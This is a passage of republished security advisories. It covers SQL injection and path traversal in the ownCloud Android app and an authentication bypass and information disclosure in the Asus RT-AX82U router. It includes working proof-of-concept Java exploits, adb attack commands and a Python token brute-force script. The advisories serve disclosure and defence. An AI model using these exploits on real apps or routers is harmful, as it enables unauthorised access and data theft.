        QUOTAS -> count = db.delete(ProviderTableMeta.USER_QUOTAS_TABLE_NAME, where, whereArgs) // injection
        // --snip--
    }
    // --snip--
}

The insert method

User input enters the content provider through the two parameters of this method:

override fun insert(uri: Uri, values: ContentValues?): Uri? {

The values parameter reaches the following dangerous arguments without sanitization:

private fun insert(db: SQLiteDatabase, uri: Uri, values: ContentValues?): Uri {
    when (uriMatcher.match(uri)) {
        ROOT_DIRECTORY, SINGLE_FILE -> {
            // --snip--
            return if (!doubleCheck.moveToFirst()) {
                // --snip--
                val fileId = db.insert(ProviderTableMeta.FILE_TABLE_NAME, null, values) // injection
                // --snip--
            }
            // --snip--
        }
        // --snip--

        CAPABILITIES -> {
            val capabilityId = db.insert(ProviderTableMeta.CAPABILITIES_TABLE_NAME, null, values) // injection
            // --snip--
        }

        UPLOADS -> {
            val uploadId = db.insert(ProviderTableMeta.UPLOADS_TABLE_NAME, null, values) // injection
            // --snip--
        }

        CAMERA_UPLOADS_SYNC -> {
            val cameraUploadId = db.insert(
                ProviderTableMeta.CAMERA_UPLOADS_SYNC_TABLE_NAME, null,
                values // injection
            )
            // --snip--
        }
        QUOTAS -> {
            val quotaId = db.insert(
                ProviderTableMeta.USER_QUOTAS_TABLE_NAME, null,
                values // injection
            )
            // --snip--
        }
        // --snip--
    }
}

The query method

User input enters the content provider through the five parameters of this method:

override fun query(
    uri: Uri,
    projection: Array<String>?,
    selection: String?,
    selectionArgs: Array<String>?,
    sortOrder: String?
): Cursor {

The selection and sortOrder parameters reach the following dangerous arguments without sanitization (note that projection is safe because of the use of a projection map):

SHARES -> {
    val supportSqlQuery = SupportSQLiteQueryBuilder
        .builder(ProviderTableMeta.OCSHARES_TABLE_NAME)
        .columns(computeProjection(projection))
        .selection(selection, selectionArgs) // injection
        .orderBy(
            if (TextUtils.isEmpty(sortOrder)) {
                sortOrder // injection
            } else {
                ProviderTableMeta.OCSHARES_DEFAULT_SORT_ORDER
            }
        ).create()

    // To use full SQL queries within Room
    val newDb: SupportSQLiteDatabase =
        OwncloudDatabase.getDatabase(MainApp.appContext).openHelper.writableDatabase
    return newDb.query(supportSqlQuery)
}

val c = sqlQuery.query(db, projection, selection, selectionArgs, null, null, order)

The update method

User input enters the content provider through the four parameters of this method:

override fun update(uri: Uri, values: ContentValues?, selection: String?, selectionArgs: Array<String>?): Int {

The values and selection parameters reach the following dangerous arguments without sanitization:

private fun update(
        db: SQLiteDatabase,
        uri: Uri,
        values: ContentValues?,
        selection: String?,
        selectionArgs: Array<String>?
): Int {
    if (selection != null && selectionArgs == null) {
        throw IllegalArgumentException("Selection not allowed, use parameterized queries")
    }
    when (uriMatcher.match(uri)) {
        DIRECTORY -> return 0 //updateFolderSize(db, selectionArgs[0]);
        SHARES -> return values?.let {
            OwncloudDatabase.getDatabase(context!!).shareDao()
                .update(OCShareEntity.fromContentValues(it)).toInt()
        } ?: 0
        CAPABILITIES -> return db.update(ProviderTableMeta.CAPABILITIES_TABLE_NAME, values, selection, selectionArgs) // injection
        UPLOADS -> {
            val ret = db.update(ProviderTableMeta.UPLOADS_TABLE_NAME, values, selection, selectionArgs) // injection
            trimSuccessfulUploads(db)
            return ret
        }
        CAMERA_UPLOADS_SYNC -> return db.update(ProviderTableMeta.CAMERA_UPLOADS_SYNC_TABLE_NAME, values, selection, selectionArgs) // injection
        QUOTAS -> return db.update(ProviderTableMeta.USER_QUOTAS_TABLE_NAME, values, selection, selectionArgs) // injection
        else -> return db.update(
            ProviderTableMeta.FILE_TABLE_NAME, values, selection, selectionArgs // injection
        )
    }
}

Impact

There are two databases affected by this vulnerability: filelist and owncloud_database.

Since the tables in filelist are affected by the injections in the insert and update methods, an attacker can use those to insert a crafted row in any table of the database containing data queried from other tables. After that, the attacker only needs to query the crafted row to obtain the information (see the Resources section for a PoC). Despite that, currently all tables are legitimately exposed through the content provider itself, so the injections cannot be exploited to obtain any extra data. Nonetheless, if new tables were added in the future that were not accessible through the content provider, those could be accessed using these vulnerabilities.

Regarding the tables in owncloud_database, there are two that are not accessible through the content provider: room_master_table and folder_backup. An attacker can exploit the vulnerability in the query method to exfiltrate data from those. Since strictMode is enabled in the query method, the attacker needs to use a blind SQL injection attack to succeed (see the Resources section for a PoC).

In both cases, the impact is information disclosure. Take into account that the tables exposed in the content provider (most of them) are already arbitrarily modifiable by third-party apps, since FileContentProvider is exported and does not require any permissions.

Resources

SQL injection in filelist

The following PoC demonstrates how a malicious application with no special permissions could extract information from any table in the filelist database exploiting the issues mentioned above:

package com.example.test;

import android.content.ContentValues;
import android.content.Context;
import android.database.Cursor;
import android.net.Uri;
import android.util.Log;

public class OwncloudProviderExploit {

    public static String exploit(Context ctx, String columnName, String tableName) throws Exception {
        Uri result = ctx.getContentResolver().insert(Uri.parse("content://org.owncloud/file"), newOwncloudFile());
        ContentValues updateValues = new ContentValues();
        updateValues.put("etag=?,path=(SELECT GROUP_CONCAT(" + columnName + ",'\n') " +
                "FROM " + tableName + ") " +
                "WHERE _id=" + result.getLastPathSegment() + "-- -", "a");
        Log.e("test", "" + ctx.getContentResolver().update(
                result, updateValues, null, null));
        String query = query(ctx, new String[]{"path"},
                "_id=?", new String[]{result.getLastPathSegment()});
        deleteFile(ctx, result.getLastPathSegment());
        return query;
    }

    public static String query(Context ctx, String[] projection, String selection, String[] selectionArgs) throws Exception {
        try (Cursor mCursor = ctx.getContentResolver().query(Uri.parse("content://org.owncloud/file"),
                projection,
                selection,
                selectionArgs,
                null)) {
            if (mCursor == null) {
                Log.e("evil", "mCursor is null");
                return "0";
            }
            StringBuilder output = new StringBuilder();
            while (mCursor.moveToNext()) {
                for (int i = 0; i < mCursor.getColumnCount(); i++) {
                    String column = mCursor.getColumnName(i);
                    String value = mCursor.getString(i);
                    output.append("|").append(column).append(":").append(value);
                }
                output.append("\n");
            }
            return output.toString();
        }
    }

    private static ContentValues newOwncloudFile() throws Exception {
        ContentValues values = new ContentValues();
        values.put("parent", "a");
        values.put("filename", "a");
        values.put("created", "a");
        values.put("modified", "a");
        values.put("modified_at_last_sync_for_data", "a");
        values.put("content_length", "a");
        values.put("content_type", "a");
        values.put("media_path", "a");
        values.put("path", "a");
        values.put("file_owner", "a");
        values.put("last_sync_date", "a");
        values.put("last_sync_date_for_data", "a");
        values.put("etag", "a");
        values.put("share_by_link", "a");
        values.put("shared_via_users", "a");
        values.put("permissions", "a");
        values.put("remote_id", "a");
        values.put("update_thumbnail", "a");
        values.put("is_downloading", "a");
        values.put("etag_in_conflict", "a");
        return values;
    }

    public static String deleteFile(Context ctx, String id) throws Exception {
        ctx.getContentResolver().delete(
                Uri.parse("content://org.owncloud/file/" + id),
                null,
                null
        );
        return "1";
    }
}

By providing a columnName and tableName to the exploit function, the attacker takes advantage of the issues explained above to:

  • Create a new file entry in FileContentProvider.
  • Exploit the SQL injection in the update method to set the path of the recently created file to the values of columnName in the table tableName.
  • Query the path of the modified file entry to obtain the desired values.
  • Delete the file entry.

For instance, exploit(context, "name", "SQLITE_MASTER WHERE type='table'") would return all the tables in the filelist database.

Blind SQL injection in owncloud_database

The following PoC demonstrates how a malicious application with no special permissions could extract information from any table in the owncloud_database database exploiting the issues mentioned above using a blind SQL injection technique:

package com.example.test;

import android.content.Context;
import android.database.Cursor;
import android.net.Uri;
import android.util.Log;

public class OwncloudProviderExploit {

    public static String blindExploit(Context ctx) {
        String output = "";
        String chars = "abcdefghijklmnopqrstuvwxyz0123456789";
        while (true) {
            int outputLength = output.length();
            for (int i = 0; i < chars.length(); i++) {
                char candidate = chars.charAt(i);
                String attempt = String.format("%s%c%s", output, candidate, "%");
                try (Cursor mCursor = ctx.getContentResolver().query(
                        Uri.parse("content://org.owncloud/shares"),
                        null,
                        "'a'=? AND (SELECT identity_hash FROM room_master_table) LIKE '" + attempt + "'",
                        new String[]{"a"}, null)) {
                    if (mCursor == null) {
                        Log.e("ProviderHelper", "mCursor is null");
                        return "0";
                    }
                    if (mCursor.getCount() > 0) {
                        output += candidate;
                        Log.i("evil", output);
                        break;
                    }
                }
            }
            if (output.length() == outputLength)
                break;
        }
        return output;
    }

}

Issue 2: Insufficient path validation in ReceiveExternalFilesActivity.java (GHSL-2022-060)

Access to arbitrary files in the app’s internal storage fix bypass

ReceiveExternalFilesActivity handles the upload of files provided by third-party components on the device. The received data can be set arbitrarily by attackers, causing some functions that handle file paths to have unexpected behavior. https://hackerone.com/reports/377107 shows how that could be exploited in the past, using the android.intent.extra.STREAM extra to force the application to upload its internal files, like com.owncloud.android_preferences.xml. To fix it, the following code was added:

private void prepareStreamsToUpload() {
    // --snip--

    for (Uri stream : mStreamsToUpload) {
        String streamToUpload = stream.toString();
        if (streamToUpload.contains("/data") &&
                streamToUpload.contains(getPackageName()) &&
                !streamToUpload.contains(getCacheDir().getPath())
        ) {
            finish();
        }
    }
}

This protection can be bypassed in two ways:

  • Using the path returned by getCacheDir() in the payload, e.g. "file:///data/user/0/com.owncloud.android/cache/../shared_prefs/com.owncloud.android_preferences.xml".
  • Using a content provider URI that uses the org.owncloud.files provider to access the app’s internal files folder, e.g. "content://org.owncloud.files/files/owncloud/logs/owncloud.2022-07-25.log".

With those payloads, the original issue can still be exploited with the same impact.

Write of arbitrary .txt files in the app’s internal storage

Additionally, there’s another insufficient path validation when uploading a plain text file that allows writing arbitrary files in the app’s internal storage.

When uploading a plain text file, the following code is executed, using the user-provided text at input to save the file:

ReceiveExternalFilesActivity:920

private void showUploadTextDialog() {
        // --snip--
        final TextInputEditText input = dialogView.findViewById(R.id.inputFileName);
        // --snip--
        setFileNameFromIntent(alertDialog, input);
        alertDialog.setOnShowListener(dialog -> {
            Button button = alertDialog.getButton(AlertDialog.BUTTON_POSITIVE);
            button.setOnClickListener(view -> {
                // --snip--
                } else {
                    fileName += ".txt";
                    Uri fileUri = savePlainTextToFile(fileName);
                    mStreamsToUpload.clear();
                    mStreamsToUpload.add(fileUri);
                    uploadFiles();
                }
                inputLayout.setErrorEnabled(error != null);
                inputLayout.setError(error);
            });
        });
        alertDialog.show();
    }

By reviewing savePlainTextToFile, it can be seen that the plain text file is temporarily saved in the app’s cache, but the destination path is built using the user-provided fileName:

ReceiveExternalFilesActivity:983

private Uri savePlainTextToFile(String fileName) {
    Uri uri = null;
    String content = getIntent().getStringExtra(Intent.EXTRA_TEXT);
    try {
        File tmpFile = new File(getCacheDir(), fileName); // here
        FileOutputStream outputStream = new FileOutputStream(tmpFile);
        outputStream.write(content.getBytes());
        outputStream.close();
        uri = Uri.fromFile(tmpFile);

    } catch (IOException e) {
        Timber.w(e, "Failed to create temp file for uploading plain text: %s", e.getMessage());
    }
    return uri;
}

An attacker can exploit this using a path traversal attack to write arbitrary text files into the app’s internal storage or other restricted directories accessible by it. The only restriction is that the file will always have the .txt extension, limiting the impact.

Impact

These issues may lead to information disclosure when uploading the app’s internal files, and to arbitrary file write when uploading plain text files (although limited by the .txt extension).

Resources

The following PoC demonstrates how to upload arbitrary files from the app’s internal storage:

adb shell am start -n com.owncloud.android.debug/com.owncloud.android.ui.activity.ReceiveExternalFilesActivity -t "text/plain" -a "android.intent.action.SEND" --eu "android.intent.extra.STREAM" "file:///data/user/0/com.owncloud.android.debug/cache/../shared_prefs/com.owncloud.android.debug_preferences.xml"

The following PoC demonstrates how to upload arbitrary files from the app’s internal files directory:

adb shell am start -n com.owncloud.android.debug/com.owncloud.android.ui.activity.ReceiveExternalFilesActivity -t "text/plain" -a "android.intent.action.SEND" --eu "android.intent.extra.STREAM" "content://org.owncloud.files/files/owncloud/logs/owncloud.2022-07-25.log"

The following PoC demonstrates how to write an arbitrary test.txt text file to the app’s internal storage:

adb shell am start -n com.owncloud.android.debug/com.owncloud.android.ui.activity.ReceiveExternalFilesActivity -t "text/plain" -a "android.intent.action.SEND" --es "android.intent.extra.TEXT" "Arbitrary contents here" --es "android.intent.extra.TITLE" "../shared_prefs/test"

Credit

These issues were discovered and reported by the CodeQL team member @atorralba (Tony Torralba).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2022-059 or GHSL-2022-060 in any communication regarding these issues.

Asus RT-AX82U vulnerability

Asus RT-AX82U vulnerability

Original text by talosintelligence

Asus RT-AX82U get_IFTTTTtoken.cgi authentication bypass vulnerability

CVE-2022-35401

An authentication bypass vulnerability exists in the get_IFTTTTtoken.cgi functionality of Asus RT-AX82U 3.0.0.4.386_49674-ge182230. A specially-crafted HTTP request can lead to full administrative access to the device. An attacker would need to send a series of HTTP requests to exploit this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Asus RT-AX82U 3.0.0.4.386_49674-ge182230

PRODUCT URLS

RT-AX82U — https://www.asus.com/us/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AX82U/

DETAILS

The Asus RT-AX82U router is one of the newer Wi-Fi 6 (802.11ax)-enabled routers that also supports mesh networking with other Asus routers. Like basically every other router, it is configurable via an HTTP server running on the local network. However, it can also be configured to support remote administration and monitoring in a more IoT style.

In order to enable remote management and monitoring of our Asus router, so that it behaves just like any other IoT device, there are a couple of settings changes that need to be made. First we must enable WAN access for the HTTPS server (or else nothing could manage the router), and then we must generate an access code to link our device with either Amazon Alexa or IFTTT. These options can all be found internally at http://router.asus.com/Advanced_Smart_Home_Alexa.asp.

As a high-level overview, upon receiving this code, the remote website will connect to your router at the get_IFTTTtoken.cgi web page and provide a shortToken HTTP query parameter. Assuming this token is received within 2 minutes of the aforementioned access code being generated, and also assuming this token matches what’s in the router’s nvram, the router will respond back with an ifttt_token that grants full administrative capabilities to the device, just like the normal token used after logging into the device via the HTTP server.

0002863c  int32_t do_get_IFTTTToken_cgi(int32_t arg1, FILE* arg2)
00028660      char* r0 = get_UA_Type(inpstr: &user_agent)                 // [1]
00028668      char* r0_2
00028668      if (r0 != 4)   // asusrouter-Windows-IFTTT-1.0
000286b0          r0_2 = get_UA_Type(inpstr: &user_agent)

// [...]
000286cc      void var_30
000286cc      memset(&var_30, 0, 0x20)
000286d8      char* r0_4 = check_if_queryitem_exists("shortToken")        // [2]
000286e0      if (r0_4 == 0)
000286e4          r0_4 = &nullptr

000286ec      int32_t r0_5 = gen_IFTTTtoken(token: r0_4, outbuf: &var_30) // [3]

00028700      fputs(str: &(*"\tif (disk_num == %d) {\n")[0x15], fp: arg2)
00028708      fflush(fp: arg2)
0002871c      fprintf(stream: arg2, format: ""ifttt_token":"%s",\n", &var_30) // [4]
00028724      fflush(fp: arg2)
00028738      fprintf(stream: arg2, format: ""error_status":"%d"\n", r0_5)
00028740      fflush(fp: arg2)
00028750      fputs(str: &data_81196, fp: arg2)
00028760      return fflush(fp: arg2)

At [1], the function pulls out the “User-Agent” header of our HTTP GET request and checks to see if it starts with “asusrouter”. It also checks if the text after the second dash is either “IFTTT” or “Alexa”. In either of those cases, it returns 4 or 5, and we’re allowed to proceed in the code path. At [2], the function pulls out the shortToken query parameter from our HTTP GET request and passes that into the gen_IFTTTtoken function at [3]. Assuming there is a match, gen_IFTTTtoken will output the ifttt_token authentication buffer to var_30, which is then sent back to the HTTP sender at [4]. Looking at gen_IFTTTtoken:

0007b5c8  int32_t gen_IFTTTtoken(char* token, uint8_t* outbuf)

0007b5d4      int32_t r0 = uptime()
0007b5fc      memset(&ifttt_token_copy, 0, 0x20)
0007b614      int32_t r0_8
0007b614      int32_t arg3
0007b614      int32_t arg4
0007b614      if (r0 - nvram_get_int("ifttt_timestamp") s> 120)       // [5]
0007b6ec          if (isFileExist("/tmp/IFTTT_ALEXA") s> 0)
0007b710              Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] short token timeout\n", "gen_IFTTTtoken", 0x3ff, token, outbuf, arg3, arg4)
0007b714          r0_8 = 1
0007b630      else if (nvram_get_and_cmp("ifttt_stoken", token) == 0) // [6]
0007b72c          if (isFileExist("/tmp/IFTTT_ALEXA") s> 0)
0007b760              Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] short token is not the same: endp…", "gen_IFTTTtoken", 0x402, token, p2_nvram_get(item: "ifttt_stoken"), arg3, arg4)
0007b764          r0_8 = 2
0007b64c      else if (get_UA_Type(inpstr: &user_agent) != 4)
0007b77c          if (isFileExist("/tmp/IFTTT_ALEXA") s> 0)
0007b7a0              Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] user_agent not from IFTTT/ALEXA\n", "gen_IFTTTtoken", 0x405, token, outbuf, arg3, 0xf1430)
0007b7a4          r0_8 = 3
0007b668      else
0007b668          int32_t r2
0007b668          uint8_t* r3
0007b668          r2, r3 = nvram_set("skill_act_code", p2_nvram_get(item: "skill_act_code_t"))
0007b674          generate_asus_token(dst: &ifttt_token_copy, len: 0x20, r2, readsrc: r3)     // [7]
0007b684          strlcpy(dst: outbuf, src: &ifttt_token_copy, len: 0x20)
0007b694          nvram_set("ifttt_token", &ifttt_token_copy)
0007b698          nvram_commit()
0007b6ac          if (isFileExist("/tmp/IFTTT_ALEXA") s> 0)
0007b6d0              Debug2File("/tmp/IFTTT_ALEXA.log", "[%s:(%d)][HTTPD] get IFTTT long token success\n", "gen_IFTTTtoken", 0x408, token, outbuf, arg3, 0xf1430)
0007b6d4          r0_8 = 0
0007b7ac      return r0_8

Right at the beginning there is a check [5] to see if the uptime of the device is more than two minutes after the ifttt_stoken has been generated. Assuming we are within that timeframe, the ifttt_stoken nvram item is grabbed and compared with our shortToken at [6]. If there’s a match, we end up hitting the code branch around [7], where the device generates a new ifttt_token and copies it to the output buffer on the next line of code. As a reminder, this token grants the same admin access as the normal HTTP login token.

While nothing really seems out of place at the moment, let’s take a look over at the code which actually generates the ifttt_stoken:

00074210  uint8_t* do_ifttt_token_generation(uint8_t* output)
// [...]
000742c0      char ifttt_token[0x80]
000742c0      memset(&ifttt_token, 0, 0x80)
000742d0      char timestamp[0x80]
000742d0      memset(&timestamp, 0, 0x80)
000742e0      char rbinstr[0x8]
000742e0      rbinstr[0].d = 0
000742e8      int32_t* randbinstrptr = &rbinstr
000742f4      rbinstr[4].d = 0
00074308      srand(x: time(timer: nullptr))
0007431c      // takes the remainder...
00074324      int_to_binstr(inp: __aeabi_idivmod(rand(), 0xff), cpydst: randbinstrptr, len: 7)              // [8]
// [...]
00074608      snprintf(s: &ifttt_token, maxlen: 0x80, format: &percent_o, binary_str_to_int(randbinstrptr)) // [9]
0007461c      nvram_set("ifttt_stoken", &ifttt_token)
00074638      snprintf(s: &timestamp, maxlen: 0x80, format: &percentld, uptime())                           // [10]
00074648      nvram_set("ifttt_timestamp", &timestamp)
00074658      strlcpy(dst: output, src: &skill_act_code, len: 0x48)
0007465c      nvram_commit()
0007466c      return output

With the unimportant code cut out, we are left with a somewhat clear view of the generation process. At [8] a random number is generated that is then reduced modulo 0xFF. This number is then transformed into a binary string of length 8 (e.g. ‘00101011’). A lot further down at [9], this randbinstrptr is converted back to an integer and fed into a call to snprintf(&ifttt_token, 0x80, "%o", ...), which generates the octal version of our original number. With this in mind, we can clearly see that the keyspace for the ifttt_stoken is only 255 possibilities, which makes brute forcing the ifttt_stoken a trivial matter. While normally this would not be a problem, since the ifttt_stoken can only be used for two minutes after generation, we can see a flaw in this scheme if we take a look at the ifttt_timestamp’s creation. At [10] we can clearly see that it is the uptime() of the device in seconds (which is taken from sysinfo()). If we recall the actual check from before:

0007b5d4      int32_t r0 = uptime()
// [...]
0007b614      if (r0 - nvram_get_int("ifttt_timestamp") s> 120)
// [...]
0007b630      else if (nvram_get_and_cmp("ifttt_stoken", token) == 0)

We can see that the current uptime is checked against the uptime recorded when the token was generated. Unfortunately for the device, uptime starts from when the device was booted, so if the device ever restarts or reboots for any reason, the ifttt_stoken suddenly becomes valid again, since the current uptime will most likely be less than the uptime() call at the point of ifttt_stoken generation. Neither the ifttt_timestamp nor the ifttt_stoken is ever cleared from nvram, even if the Amazon Alexa and IFTTT settings are disabled, and so the device remains vulnerable from the moment the configuration is first generated.
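Since the keyspace is only 255 octal strings and the User-Agent check is trivial to satisfy, the whole bypass reduces to a short brute-force loop. A minimal sketch in Python (the router address, scheme, and port are placeholders; the endpoint, shortToken parameter, User-Agent format, and response fields come from the analysis above, and the response parsing is deliberately loose):

import requests

# Placeholder target; in a real setup this is the WAN-exposed admin interface.
BASE_URL = "https://192.168.50.1:8443"

# get_IFTTTtoken.cgi only proceeds when the User-Agent looks like an IFTTT/Alexa client.
HEADERS = {"User-Agent": "asusrouter-Windows-IFTTT-1.0"}

def brute_force_short_token():
    # The short token is snprintf("%o", rand() % 0xff), so there are at most 255 candidates.
    for n in range(0xFF):
        candidate = format(n, "o")
        r = requests.get(
            f"{BASE_URL}/get_IFTTTtoken.cgi",
            params={"shortToken": candidate},
            headers=HEADERS,
            verify=False,
            timeout=5,
        )
        # On a match the handler sets error_status to 0 and returns a non-empty
        # ifttt_token that grants full admin access (formatting per the fprintf
        # calls shown earlier, so this check is intentionally rough).
        if '"error_status":"0"' in r.text:
            return candidate, r.text
    return None, None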

Asus RT-AX82U cfg_server cm_processREQ_NC information disclosure vulnerability

CVE-2022-38105

SUMMARY

An information disclosure vulnerability exists in the cm_processREQ_NC opcode of the Asus RT-AX82U 3.0.0.4.386_49674-ge182230 router’s configuration service. A specially-crafted network packet can lead to a disclosure of sensitive information. An attacker can send a network request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Asus RT-AX82U 3.0.0.4.386_49674-ge182230

PRODUCT URLS

RT-AX82U — https://www.asus.com/us/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AX82U/

DETAILS

The Asus RT-AX82U router is one of the newer Wi-Fi 6 (802.11ax)-enabled routers that also supports mesh networking with other Asus routers. Like basically every other router, it is configurable via an HTTP server running on the local network. However, it can also be configured to support remote administration and monitoring in a more IoT style.

The cfg_server and cfg_client binaries living on the Asus RT-AX82U are both used for easy configuration of a mesh network setup, which can be done with multiple Asus routers via their GUI. Interestingly though, the cfg_server binary is bound to TCP and UDP port 7788 by default, exposing some basic functionality. The TCP and UDP ports have different opcodes, but for our sake, we’re only dealing with the TCP opcodes, which look like such:

type_dict = {
   0x1    :   "cm_processREQ_KU",   // [1]
   0x3    :   "cm_processREQ_NC",   // [2]
   0x4    :   "cm_processRSP_NC",
   0x5    :   "cm_processREP_OK",
   0x8    :   "cm_processREQ_CHK",
   0xa    :   "cm_processACK_CHK",
   0xf    :   "cm_processREQ_JOIN",
   0x12   :   "cm_processREQ_RPT",
   0x14   :   "cm_processREQ_GKEY",
   0x17   :   "cm_processREQ_GREKEY",
   0x19   :   "cm_processREQ_WEVENT",
   0x1b   :   "cm_processREQ_STALIST",
   0x1d   :   "cm_processREQ_FWSTAT",
   0x22   :   "cm_processREQ_COST",
   0x24   :   "cm_processREQ_CLIENTLIST",
   0x26   :   "cm_processREQ_ONBOARDING",
   0x28   :   "cm_processREQ_GROUPID",
   0x2a   :   "cm_processACK_GROUPID",
   0x2b   :   "cm_processREQ_SREKEY",
   0x2d   :   "cm_processREQ_TOPOLOGY",
   0x2f   :   "cm_processREQ_RADARDET",
   0x31   :   "cm_processREQ_RELIST",
   0x33   :   "cm_processREQ_APLIST",
   0x37   :   "cm_processREQ_CHANGED_CONFIG",
   0x3b   :   "cm_processREQ_LEVEL",
}  

Out of the 24 different opcodes, only 3 or so can be used without authentication, and so let’s start from the top with cm_processREQ_KU [1]. The simplest request, it demonstrates the basic TLV structure of the cfg_server:

struct REQ_TLV = {
    uint32_t tlv_type;
    uint32_t size;
    uint32_t crc;
    char buffer[];
}

For the cm_processREQ_KU request, type is 1 and the crc doesn’t actually matter, but the size field will always be the size of the buffer field, not the rest of the headers. Regardless, this particular request gets responded to with the server’s public RSA key. This RSA key is needed in order to send a valid cm_processREQ_NC [2] packet, which is where our bug is. The cm_processREQ_NC request is a bit complex, but the structure is given below:

struct REQ_NC = {
    uint32_t tlv_type = "\x00\x00\00\x03",
    uint32_t size,
    uint32_t crc,
    uint32_t tlv_subpkt1 = "\x00\x00\x00\x01", //[3]
    uint32_t sizeof_subpkt1,
    uint32_t crcof_subpkt1,
    char master_key[ ],                        //[4]
    uint32_t tlv_subpkt2 = "\x00\x00\x00\x03",
    uint32_t sizeof_subpkt2,   
    uint32_t crcof_subpkt2,
    char client_nonce[ ],                      //[5]
}
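Before a REQ_NC can be sent, its body has to be encrypted with the RSA key returned by cm_processREQ_KU, so the first exchange is just a single TLV round trip. A minimal Python sketch (the router address is a placeholder; the big-endian type/size/crc header layout follows the struct above and the example packet in the PoC output at the end of this advisory, and zlib.crc32 is only an assumption since the crc is not checked for REQ_KU):

import socket
import struct
import zlib

ROUTER_IP = "192.168.50.1"  # placeholder address
CFG_PORT = 7788

def build_tlv(tlv_type: int, payload: bytes) -> bytes:
    # Big-endian type / size / crc header followed by the payload.
    # size only covers the payload, not the 12-byte header.
    crc = zlib.crc32(payload) & 0xFFFFFFFF
    return struct.pack(">III", tlv_type, len(payload), crc) + payload

def fetch_public_key() -> bytes:
    # cm_processREQ_KU is opcode 0x1; the response contains the server's RSA
    # public key, needed to encrypt the body of a later cm_processREQ_NC (0x3).
    with socket.create_connection((ROUTER_IP, CFG_PORT), timeout=5) as s:
        s.sendall(build_tlv(0x1, b"\x11\x22\x33\x44"))
        return s.recv(8192)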

The cm_processREQ_NC request provides the server with two different items that are used to generate the session key needed for all subsequent requests: the master_key [4] and the client_nonce [5]. A quick note before we get to that: everything in the packet starting from the tlv_subpkt1 field at [3] gets encrypted with the RSA public key that we get from the cm_processREQ_KU request, so there’s an implicit length limitation due to RSA encryption. Continuing on, the master_key [4] buffer is used as the aes_ecb_256 key that the server will use to encrypt the response to this packet, and the client_nonce buffer is used to generate a session key later on. Let us now examine what the server sends in return:

[~.~]> x/60bx $r1
0xb62014e0:     0x00    0x00    0x00    0x02    0x00    0x00    0x00    0x20 // headers
0xb62014e8:     0x06    0x42    0x18    0x4f    
   
0xb62014ec:     0x13    0x9f    0x09    0x97 // server nonce [6]
0xb62014f0:     0x90    0x92    0x9b    0x85    0xe5    0x40    0xa1    0x38
0xb62014f8:     0xd7    0x81    0x62    0x72    0xf6    0x88    0x5c    0xef
0xb6201500:     0x61    0x86    0x5c    0xc0    0xef    0xc0    0x06    0x23
0xb6201508:     0xa2    0x6d    0x6a    0x85    
                                 
0xb620150c:     0x00    0x00    0x00    0x03                     // headers
0xb6201510:     0x00    0x00    0x00    0x04    0x51    0xb3    0x28    0x43
0xb6201518:     0xcc    0xcc    0xcc    0xcc // [...]            // client nonce [7]

Both the server_nonce at [6] and the client_nonce [7] are AES encrypted and sent back to us. Subsequent authentication consists of generating a session key from sha256(groupid + server_nonce + client_nonce). In order to hit our bug, we don’t even need to go that far. Let us take a quick look at how the AES encryption happens:

0001d8b0    void *aes_encrypt(char *enckey, char *inpbuf, int32_t inpsize, uint32_t outsize){
0001d8c8         int32_t ctx = EVP_CIPHER_CTX_new();
0001d8d4         if (ctx == 0){ ... }
0001d904         else {
0001d914              int32_t r0_2 = EVP_EncryptInit_ex(ctx: ctx, type: EVP_aes_256_ecb(), imple: null, key: enckey, iv: nullptr);

We don’t need to delve too much into what occurs; it suffices to know that the key is passed directly from the enckey parameter straight into EVP_EncryptInit_ex. Backing up to find what exactly is passed:

00057534 int32_t cm_processREQ_NC(int32_t clifd, struct ctrlblk *ctrl, void *tlvtype, int32_t pktlen, void *tlv_checksum, struct tlv_ret_struct* sess_block, char *pktbuf, uint32_t client_ip, char *cli_mac){
{...}
00058b58    void *aes_resp = aes_encrypt(enckey: sess_block->master_key, inpbuf: nonce_buff, inpsize: clinonce_len + sess_block->server_nonce_len + 0x18, outsize: &act_resp_b_size);

We can see it involves the master_key that we provided. Let’s back up further in cm_processREQ_NC to see exactly how it’s populated:

00057534 int32_t cm_processREQ_NC(int32_t clifd, struct ctrlblk *ctrl, void *tlvtype, int32_t pktlen, void *tlv_checksum, struct tlv_ret_struct* sess_block, char *pktbuf, uint32_t client_ip, char *cli_mac){
// [...]
00057af4              int32_t req_type = decbuf_0x1002.request_type_le
00057af4              int32_t req_len = decbuf_0x1002.total_len_le
00057af4              int32_t req_crc = decbuf_0x1002.crc_mb
00057b00              int32_t reqlen = req_len u>> 0x18 | (req_len u>> 0x10 & 0xff) << 8 | (req_len u>> 8 & 0xff) << 0x10 | (req_len & 0xff) << 0x18
00057b08              int32_t reqcrcle_
00057b08              if (reqlen != 0)
00057b10                  reqcrcle_ = req_crc u>> 0x18 | (req_crc u>> 0x10 & 0xff) << 8 | (req_crc u>> 8 & 0xff) << 0x10 | (req_crc & 0xff) << 0x18
00057b18                  if (reqcrcle_ != 0)
00057bb4                      if (req_type != 0x1000000)  // master key [8]
                                    // [...]
00057c48                      int32_t decsize_m0xc = size_of_decrypted - 0xc
00057c50                      if (decsize_m0xc u< reqlen)  // [9]
                                    // [...]
00057cf0                      char (* var_1048_1)[0x1000] = &dec_buf_contents
00057d00                      if (do_crc32(IV: 0, buf: &dec_buf_contents, bufsize: reqlen) != reqcrcle_) [10]
                                    // [...]
00057d94                      sess_block->masterkey_size = reqlen
00057d9c                      char* aeskey_malloc = malloc(bytes: reqlen) // [11]
00057da8                      sess_block->master_key = aeskey_malloc
                                    // [...]
00057db8                      memset(aeskey_malloc, 0x0, reqlen);  
00057dd8                      memcpy(aeskey_malloc, &dec_buf_contents, reqlen); 

